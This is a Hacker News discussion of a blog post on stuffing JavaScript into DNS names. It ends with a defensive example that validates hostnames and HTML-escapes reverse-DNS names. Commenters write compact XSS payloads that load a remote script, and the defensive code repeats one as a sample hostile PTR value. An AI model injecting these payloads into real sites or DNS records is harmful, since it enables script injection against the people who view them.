

Stuffing Javascript into DNS names - coderdude
http://www.skullsecurity.org/blog/?p=433

======
jerf
Making a script tag load an arbitrary remote script file without a space:

    <script>s=document.createElement("script");
            s.setAttribute("src","http://www.skullsecurity.org/test-js.js");
            document.body.appendChild(s)</script>

For our convenience I put newlines in, just remove them. I checked it on the
javascript: line (where you have to add javascript:, surround it with void(),
and change the semicolons to commas). If that doesn't exactly work, something
like it could. Any JS framework with the ability to use objects to set
attributes on a new tag could be written more concisely but this doesn't
depend on any frameworks.

~~~
Sephr
appendChild returns the appended child, so you can shorten that to the
following:

    <script>document.body.appendChild(document.createElement("script")).src="http://www.skullsecurity.org/test-js.js"</script>

------
wccrawford
The reverse DNS bit would be amazing. Do a bobby tables on it and watch sites
fall just from visiting them.

Of course I wouldn't -do- such a thing, but it would be crazy to see.

------
olalonde
They really mean it when they say "never trust user input".

------
carson
Even though he only brings it up at the end, reverse DNS entries could end up
being the scariest.

------
scg
Other potential attack targets: admin UIs for routers, webhosting cpanels, web
crawlers with DNS cache.
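The defensive side of the reverse-DNS point raised above, as an added example that is not from the thread or the linked post: an admin UI that displays the PTR name of each visitor has to treat that name as untrusted, since a DNS name can carry almost any byte. The sample PTR values, the `example.net` host and the `example.invalid` URL are constructed for the demonstration.

```javascript
// A DNS name is not limited to hostname characters, so a PTR answer can
// contain markup such as the space-free loader shown in the thread. Two
// layers protect the page: reject anything that is not a valid hostname,
// and HTML-escape whatever is rendered regardless of that check.

const HOSTNAME_LABEL = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/i;

// RFC 1123 hostname syntax: dot-separated labels of 1-63 characters,
// alphanumerics and hyphens only, no leading or trailing hyphen, and a
// total length of at most 253 characters (a trailing root dot is allowed).
function isValidHostname(name) {
  const trimmed = name.endsWith('.') ? name.slice(0, -1) : name;
  if (trimmed.length === 0 || trimmed.length > 253) return false;
  return trimmed.split('.').every((label) => HOSTNAME_LABEL.test(label));
}

// Escaping for HTML text content and double-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// One table row for the admin UI. The rejected case is escaped as well, so
// raw PTR data is never written into the page as markup.
function renderClientRow(ip, ptrName) {
  const shown = isValidHostname(ptrName)
    ? ptrName
    : `(rejected PTR: ${ptrName})`;
  return `<tr><td>${escapeHtml(ip)}</td><td>${escapeHtml(shown)}</td></tr>`;
}

// Constructed sample lookups: a normal PTR answer and a hostile one that
// carries the loader from the thread (pointed at a placeholder URL).
const SAMPLE_PTRS = [
  ['192.0.2.10', 'host-10.example.net.'],
  ['192.0.2.11', '<script>document.body.appendChild(document.createElement("script")).src="http://example.invalid/x.js"</script>'],
];

for (const [ip, ptr] of SAMPLE_PTRS) {
  console.log(renderClientRow(ip, ptr));
}
```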

